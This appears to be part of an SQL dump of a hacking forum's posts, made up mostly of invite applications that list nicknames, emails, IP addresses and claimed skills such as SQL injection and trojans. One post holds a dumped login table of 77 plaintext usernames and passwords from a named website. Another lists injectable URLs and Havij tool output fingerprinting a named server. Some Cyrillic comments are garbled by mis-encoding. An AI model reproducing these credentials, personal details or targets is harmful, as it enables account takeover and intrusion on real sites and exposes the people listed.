1407743135, '[SIZE=\'4\'][COLOR=\'Sienna\']Dubious[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Dubious@irc.net\n[b]e-mail[/b]: byhkkqpz@sharklasers.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 178.32.181.98\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1507, 1365, 0, 'Invite', 2, '{$name}', 1407744547, '[SIZE=\'4\'][COLOR=\'Sienna\']faza02[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 532673\n[b]e-mail[/b]: yarbabin@gmail.com\n[b]Info[/b]: https://rdot.org/forum/member.php?u=1045\r\n\r\nCompetitive Intelligence, Web-vulns, Programing (Simple scripts in Python, C, C#)\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 192.162.88.2\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1508, 1083, 1362, 'kx00', 6, '', 1407746563, '[url]http://www.caribbeancom.com/[/url]\r\n\r\n[HTML]Database: movie\r\n[10 tables]\r\n+----------+\r\n| category |\r\n| coupon |\r\n| group |\r\n| login |\r\n| movie |\r\n| orders |\r\n| parts |\r\n| ranking |\r\n| rating |\r\n| series |\r\n+----------+[/HTML]\r\n[HTML]Table: login\r\n[77 entries]\r\n+----------------------+---------+--------------+-----------------+\r\n| user_id | site_id | password | user_name |\r\n+----------------------+---------+--------------+-----------------+\r\n| tmasami | 1700 | LKjsdf3af3a | tmasami |\r\n| studio9014 | 9014 | Lp8jKb6A | H&H |\r\n| webmaster1100 | 1100 | diwoa4wa | webmaster1100 |\r\n| masako | 1700 | mbarrow | Masako Barrow |\r\n| hitomi | 1700 | i86yuLMa+ | hitomi |\r\n| momoko | 1700 | Mnm58bbS] | momoko |\r\n| wuehara | 1700 | zwM52Fm2BSOF | wuehara |\r\n| webmaster1900 | 1900 | GEi8OavC | webmaster1900 |\r\n| mizuho | 1700 | Lbsb>9rQ8 | mizuho |\r\n| kengo | 1700 | test1234 | Kengo Tateda |\r\n| syamamoto | 1700 | Lpm8nyR5 | syamamoto |\r\n| hiro | 1700 | hzusho | Hiro Zusho |\r\n| mariko | 1700 | megami | Mariko Egami |\r\n| nancy | 1700 | nim | Nancy IM |\r\n| daniel | 1700 | dlemos | Daniel Lemos |\r\n| kazunori | 1700 | Lkgm1DSU | Kazunori Koga |\r\n| sales1700 | 1700 | f1Ha8k7A | sales1700 |\r\n| guest1700 | 1700 | AsiDF5de | guest1700 |\r\n| manager1700 | 1700 | Re35Desp | manager1700 |\r\n| webmaster1700 | 1700 | ot8B3cua | webmaster1700 |\r\n| webmaster1200 | 1200 | mRkiap41 | webmaster1200 |\r\n| webmaster1300 | 1300 | iu8aPlev | webmaster1300 |\r\n| webmaster1400 | 1400 | foRpW3gh | webmaster1400 |\r\n| webmaster2300 | 2300 | 52e8irp6 | webmaster2300 |\r\n| webmaster1600 | 1600 | dpe16Vew | webmaster1600 |\r\n| webmaster1800 | 1800 | wosp2Bfr | webmaster1800 |\r\n| webmaster2001 | 2001 | s2xy6me | webmaster2001 |\r\n| studio1500 | 1500 | R5RX8zmU | AVBOX |\r\n| webmaster2200 | 2200 | tWC2RExy | webmaster2200 |\r\n| studio1600 | 1600 | BWhsvHV7 | Dreamroom |\r\n| studio2000 | 2000 | gSfoQQ1w | スカイãƒÂイ |\r\n| studio2100 | 2100 | KyGxZ5qc | S2 エンターテイメント |\r\n| studio9001 | 9001 | snGE1LRN | MUGEN エンターテイメント |\r\n| studio9002 | 9002 | 5q9I7leH | KOKESHI |\r\n| miwa | 1700 | 3939 | miwa |\r\n| d2p | 1700 | MhXv3kkN | D2P |\r\n| akipikka | 1700 | lovemiyomiyo | Akiko Yamamoto |\r\n| dti | 1700 | f1Ha8k7A | staff |\r\n| studio9003 | 9003 | X0tOLs81 | V & R |\r\n| studio9004 | 9004 | QU857aQo | TERIYAKI |\r\n| guest1100 | 1100 | NGm885Wj | guest1100 |\r\n| guest1300 | 1300 | 1wEzY1R7 | guest1300 |\r\n| guest1400 | 1400 | T43YhBc8 | guest1400 |\r\n| guest1800 | 1800 | 964vEKPm | guest1800 |\r\n| guest2200 | 2200 | a9w7ku22 | guest2200 |\r\n| guest1900 | 1900 | QwsF96S7 | guest1900 |\r\n| studio9005 | 9005 | A3TAfe29 | PROGRE |\r\n| enokida | 1700 | e32cy74 | S Enokida |\r\n| studio9010 | 9010 | AkH9Jn71 | スタジオ舞妓 |\r\n| studio9011 | 9011 | Ak8s7jwe | TERIYAKI2 |\r\n| blog1700 | 1700 | Anbksu8ah | blog1700 |\r\n| studio_prog_1600 | 1600 | Ua8aj2Jab4K | PROG |\r\n| studio9102 | 9102 | KaL9UryqBs | B-DASH |\r\n| studio_skyhighx_2000 | 2000 | LAKfs8dfh2l3 | スカイãƒÂイX |\r\n| studio9013 | 9013 | avwP3Cse | hotcream |\r\n| studio9012 | 9012 | Alkjsdf823b | Stage2Media |\r\n| studio_prog2_1600 | 1600 | LKjs983a4bd | PROG2 |\r\n| cjun | 1700 | B1fEAxuCU16y | cjun |\r\n| studio_prog3_1600 | 1600 | 8Hjk2FgwPU | PROG3 |\r\n| dlsystems | 1100 | Kjsd92kasdf | dl systems |\r\n| webmaster2400 | 2400 | JKsd8nhj2 | webmaster2400 |\r\n| ahiguchi | 1700 | akE88AisBIn2 | ahiguchi |\r\n| ysakakibara | 1700 | Xk982jBadf | ysakakibara |\r\n| studio_master | 1100 | Le8H3pEsm | studio_master |\r\n| webmaster1100en | 1100 | Okei3ush4 | webmaster1100en |\r\n| studio9015 | 9015 | 9KjeuHg5 | ティティ (グレイズ) |\r\n| studio9016 | 9016 | 7E3Lgrdg8 | ティティ(TMA) |\r\n| studio9017 | 9017 | Nmajr8kL | MERCI BEAUCOUP |\r\n| weslee1100 | 1100 | Laki8HjmC | weslee1100 |\r\n| marchin1100 | 1100 | O19jF48C | marchin1100 |\r\n| studio9018 | 9018 | L7dTk3qP | Climax Zipang |\r\n| studio9019 | 9019 | Yel7t4ks | ティティ(ABC) |\r\n| studio9020 | 9020 | datPq3r9 | PINK CHAMPAGNE |\r\n| sshimizu | 1700 | hdky5JQzVP | sshimizu |\r\n| studio9021 | 9021 | da4El3pQ | studio MFK |\r\n| studio9022 | 9022 | hlteE9a1P | MURAKAMI(ムラカミ) |\r\n| mmusashi | 1700 | KL89s2afv3 | mmusashi |\r\n+----------------------+---------+--------------+-----------------+[/HTML]\r\n\r\nâðú, ÑÂтø ÷òõрø ðôüøýþòÑÂúøõ. ÃÂôüøýúу ýõ ýðшõû. ÕÑÂть /webmasters/ ýþ ÿþчõüу тþ ÿõрõýðÿрðòÃȄÂõт ýð index, òþ÷üþöýþ ôõûþ ò IP.\r\n \r\nî÷õры ðòтþрø÷уютÑÂѠчõрõ÷ d2pass. òðрøðýт, ýуöõý шõûû ýð b.caribbeancom.com тðü ðòтþрø÷ðцøѠчõрõ÷ API øôõт.', 1, 1, '', 0, 1, 0, 0, 0), (1509, 1366, 0, 'Invite', 2, '{$name}', 1407747193, '[SIZE=\'4\'][COLOR=\'Sienna\']Leetrax[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: x3o.1337@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 103.230.106.28\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.soonvibes.com/profile/index/id/4965-lee-trax | http://www.soonvibes.com/profile/index/id/4965-lee-trax \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1510, 1363, 1505, 'null', 9, '', 1407750048, '[QUOTE][url]http://e-cultura.sapo.pt/WebETeatro.aspx?ID=1[/url][/QUOTE]\r\n\r\n[QUOTE][url]http://www.citador.iol.pt/poemas.php?op=10&refid=200809030120[/url][/QUOTE]\r\nÿðрðüõтр refid\r\n\r\n[QUOTE][url]http://kontakten.dn.se/index.php?pg=ProfileSearch&AdNum=201484[/url][/QUOTE]\r\n\r\nÿрø ÿþüþщø havij\r\nTarget: [url]http://kontakten.dn.se/index.php?pg=ProfileSearch&AdNum=201484[/url]\r\nHost IP: 62.236.255.55\r\nWeb Server: Embperl/2.0rc3 Apache/2.0.50 (Linux/SUSE)\r\nPowered-by: PHP/4.3.8\r\nDB Server: MySQL\r\nResp. Time(avg): 118 ms\r\nCurrent User: [email]tansuk@weturi.lucentia.com[/email]\r\nSql Version: 4.0.21-log\r\nCurrent DB: MSGMAN_SE\r\nSystem User: [email]tansuk@weturi.lucentia.com[/email]', 1, 0, '', 0, 1, 0, 0, 0), (1511, 1367, 0, 'Invite', 2, '{$name}', 1407750172, '[SIZE=\'4\'][COLOR=\'Sienna\']swp[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: swpower@exploit.im\n[b]e-mail[/b]: powersw@hushmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\nVery good at sqlinjection discovering, looking for some new methods\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 92.37.11.132\n[*][b]real ip[/b]: 92.37.11.132\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://swp.jku.at | swp.jku.at \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1512, 1368, 0, 'Invite', 2, '{$name}', 1407750184, '[SIZE=\'4\'][COLOR=\'Sienna\']swp[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: swpower@exploit.im\n[b]e-mail[/b]: powersw@hushmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\nVery good at sqlinjection discovering, looking for some new methods\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 92.37.11.132\n[*][b]real ip[/b]: 92.37.11.132\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://swp.jku.at | swp.jku.at \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1513, 1369, 0, 'Invite', 2, '{$name}', 1407750199, '[SIZE=\'4\'][COLOR=\'Sienna\']swp[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: swpower@exploit.im\n[b]e-mail[/b]: powersw@hushmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\nVery good at sqlinjection discovering, looking for some new methods\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 92.37.11.132\n[*][b]real ip[/b]: 92.37.11.132\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://swp.jku.at | swp.jku.at \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1514, 1370, 0, 'Invite', 2, '{$name}', 1407751246, '[SIZE=\'4\'][COLOR=\'Sienna\']ghostx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 697158251\n[b]e-mail[/b]: xtrem375@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.179.113.12\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ghostx.wikia.com | ghostx.wikia.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1515, 1371, 0, 'Invite', 2, '{$name}', 1407751327, '[SIZE=\'4\'][COLOR=\'Sienna\']ghostx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 697158251\n[b]e-mail[/b]: xtrem375@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.179.113.12\n[*][b]real ip[/b]: 79.179.113.12\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ghostx.wikia.com | ghostx.wikia.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1516, 1372, 0, 'Invite', 2, '{$name}', 1407753219, '[SIZE=\'4\'][COLOR=\'Sienna\']Dz021[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Hacker\n[b]e-mail[/b]: ziadchanneltv@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.97.163.155\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/minimized.../436526182524149760 | https://twitter.com/minimized.../436526182524149760 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1517, 1373, 0, 'Invite', 2, '{$name}', 1407754906, '[SIZE=\'4\'][COLOR=\'Sienna\']betshx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: betshx@jabber.root.cz\n[b]e-mail[/b]: betshx@live.ca\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.140.8.135\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/Betshx/status/493011640158543872 | https://twitter.com/Betshx/status/493011640158543872 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1518, 1374, 0, 'Invite', 2, '{$name}', 1407756422, '[SIZE=\'4\'][COLOR=\'Sienna\']WarFarMa[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: fake@email.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 2.6.133.21\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/WarFarMa | https://twitter.com/WarFarMa \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1519, 1375, 0, 'Invite', 2, '{$name}', 1407760554, '[SIZE=\'4\'][COLOR=\'Sienna\']zixia[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 1111111\n[b]e-mail[/b]: 2305212271@qq.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 192.157.231.105\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://zixia.net | zixia.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1520, 1376, 0, 'Invite', 2, '{$name}', 1407760730, '[SIZE=\'4\'][COLOR=\'Sienna\']zixia[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: not have\n[b]e-mail[/b]: 2305212271@qq.com\n[b]Info[/b]: I am a web pentester.and focus on web security research.\r\nand from china .thanks for give me an opportunity to get in. \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 192.157.231.105\n[*][b]real ip[/b]: 192.157.231.105\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://zixia.net | zixia.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1521, 1377, 0, 'Invite', 2, '{$name}', 1407762013, '[SIZE=\'4\'][COLOR=\'Sienna\']goodtrip[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: sutigi@alivance.com\n[b]e-mail[/b]: sutigi@alivance.com\n[b]Info[/b]: hacking, windows expl, sql injection, bases, trojans\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 95.42.63.35\n[*][b]real ip[/b]: 95.42.63.35\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/GoodTrip_kyoto | 